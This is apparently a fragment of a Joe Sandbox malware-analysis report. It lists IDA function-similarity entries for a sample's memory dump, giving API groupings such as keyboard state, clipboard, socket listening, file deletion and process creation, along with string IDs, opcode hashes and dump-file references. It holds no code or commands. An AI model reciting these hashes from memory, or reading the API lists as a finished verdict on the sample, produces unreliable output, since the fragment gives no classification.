                                                            • Instruction ID: f280e59389bc0cc350884f657cf35f939d5d6c287150762f76760a7e32798965
                                                            • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction Fuzzy Hash: F6A18E32A0868186FB24FF25E4546EAF761FB84788F988135DB5E03A94CF7CE546C711
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Time$File$FindLocalSystem$CloseFirst
                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                            • API String ID: 3232708057-3289030164
                                                            • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                            • Instruction ID: 4ed7854ac3ba407ef39c82d64582e0c7b2ae27fd5d0542a915276e54419b1c72
                                                            • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                            • Instruction Fuzzy Hash: B5D19062B18A9285EF10FFA5E4450FEA761FB80794FC40132EA4D47AA9EF7CD509C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: SendString
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 890592661-1007645807
                                                            • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                            • Instruction ID: 072d27e9cba7a56555e12459ae99047bbd059c362d819dab020f21ecda408df4
                                                            • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                            • Instruction Fuzzy Hash: CD214162F189D3E1EB20FB24F894AEAA721BBD4748FC84031EA4D43958DF2CD905C764
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                            • Instruction ID: 288f9e9e94772734b43bf397cc5c821fc5bc1ea1e160c5fd7a900cb4375c9088
                                                            • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                            • Instruction Fuzzy Hash: C771AE12A0C2C285EF34AB24B0402FAAB61EF46B88FDD0439D68E07292CF5DDD46D771
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                            • Instruction ID: dc64134db0048802e47500a2c7fda268a116e53e7714c1eb53b0ab5993f4c03d
                                                            • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                            • Instruction Fuzzy Hash: 4561AF22B0569186EF10EF61E8545FCB7B4FB44B88B8C4035DE4A53795EF39D946C3A0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                            • Instruction ID: fd669ee48a6b73e88814f4fceba0812aac0e39d6eca6280b4850b9158b0e0023
                                                            • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                            • Instruction Fuzzy Hash: 0A415E76A08A8285EF10FF25E8841ECA771FB88B94FD94432CA0D07755EF38E585C360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                            • Instruction ID: 581a71b5e5ffeb39de4962db5d3a5c52c0e4cfd79eb0ae4294cddcb558cabb7c
                                                            • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                            • Instruction Fuzzy Hash: E7D16E36B04B8686EF50EF69E4901EDA3B1FB98B88B994036CE4D97B54DF38D445C360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                            • Instruction ID: 41b2cc5a1eaa82d6455dd56ab77d86ca1c018005353ee9c4027ff080fbdb6afb
                                                            • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                            • Instruction Fuzzy Hash: F4415D71A086C286EF44BB15E4983B8B760FF94B85F8D4435CA4E477A6DF7CE0418724
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4047182710-1173974218
                                                            • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                            • Instruction ID: af466fc93c0577b550c8cf74eba56a9e25a4d71142f72a67f31a159c4c0471d4
                                                            • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                            • Instruction Fuzzy Hash: 7B813522E08A82D5EF10FB65F4501EDAB60EB94794FC84032EA4E479A9DF7CD54AC720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: ?
                                                            • API String ID: 500310315-1684325040
                                                            • Opcode ID: 95b5e6a413fed930f1bb5b391612c789b8d09045f7789be0dd1e1e78d96feb17
                                                            • Instruction ID: f55412cb9340f0058ed479ddf412f8073e08a96001edcbd6f7478967e5f563f2
                                                            • Opcode Fuzzy Hash: 95b5e6a413fed930f1bb5b391612c789b8d09045f7789be0dd1e1e78d96feb17
                                                            • Instruction Fuzzy Hash: 7461BF72A086C286FB21EF25FA405E9B7A4FF48794FD80135EA0D46A94DF3CE441C761
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                            • Instruction ID: ff5ebf3f51659b1d022e86ac0f8d2ffd2da2d7ef33affe52d79b8b1d08012580
                                                            • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                            • Instruction Fuzzy Hash: 9241C271B086C286EF54FF1AA4542B8A760FB84BA0F984631DE5E47792DF3CD0418724
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                            • Instruction ID: 2e6f1beadd4e06d19c6dc0c88b2be734904e42bc8931cc023603da6a0d3946b7
                                                            • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                            • Instruction Fuzzy Hash: 94417221A28AC292EF50FB10F8441EDA360FBD4B94FD85131EA5E43695EF7CD906C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                            • Instruction ID: b59732273103be0ef75a7f61f96a56abb5966642aa75969736acf913db3b1fdc
                                                            • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                            • Instruction Fuzzy Hash: 4A316236608BC186DB60DF25F8402EEB3A4FB88754F940135EA9D47B59DF3CD5458B10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                            • Instruction ID: e466e5ca8d412d0ee236f46ab3c4509348159ffaabcc08ea1d96e4b810267b7c
                                                            • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                            • Instruction Fuzzy Hash: C4315A32609BC586DB609F02F4807AAB7A4FB88B90F594126DECE43B18DF3DD445CB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                            • Instruction ID: 7560f1728fbc46e6ebf4474b4adeb1194ee3a0adfaf45692049732b97596f313
                                                            • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                            • Instruction Fuzzy Hash: 73F0A225A14A41C3DF04EF76EC94069A361EF88FA5B895235CE1E46364CF3CD4969320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                            • String ID: *.*
                                                            • API String ID: 1927845040-438819550
                                                            • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                            • Instruction ID: 7b3b05c06cddf2bf3d25c9768d90cbf171b8acdd526bbcef6ea0844a548abf40
                                                            • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                            • Instruction Fuzzy Hash: 7551A122A08AC285EF10EF55F8641EDA3B0FB85794F980132DE5D43799DF38E54AC720
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-2187161917
                                                            • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                            • Instruction ID: 8ad851b9ec5f61a773f8a0321cbab6fd0bf97560e958a20bad8274c6b1053d22
                                                            • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                            • Instruction Fuzzy Hash: 34B2C272E087D286EF24BF25A5046FCB7A1FB94788F984135DA4D57B85EF38E8408721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                            • Instruction ID: 014384bdc58f0cceee5c12ef35c375e5153884b1ab0116dd57d54f3d92922154
                                                            • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                            • Instruction Fuzzy Hash: D351D221B0869285DF14FB16B4146E9ABA0BB89FE0F8C4131DE5E47796EF3CE40087A0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 3769357847-24824748
                                                            • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                            • Instruction ID: 6f627b9a179eb7e1bc4d3515a9afd26b757b5acc6499a613675c5528d529d962
                                                            • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                            • Instruction Fuzzy Hash: F4D15B76B08A8685EF10EF66E4902ED77B0EB88F88B894032DE4D57B59DF39D445C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$VUUU$fmod
                                                            • API String ID: 1757819995-2579133210
                                                            • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                            • Instruction ID: 73f3af04ba0d5acaa82cbef2a5b669d3a5f30ef4901aa0f19d712517592edfab
                                                            • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                            • Instruction Fuzzy Hash: AFB12B21E1DFC545DAB38A3464113F6F259AFAA390F58C732D94E36BA4DF2C99C28700
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75F182D60
                                                              • Part of subcall function 00007FF75F17B184: GetCurrentProcess.KERNEL32(00007FF75F17B21D), ref: 00007FF75F17B1B1
                                                            Strings
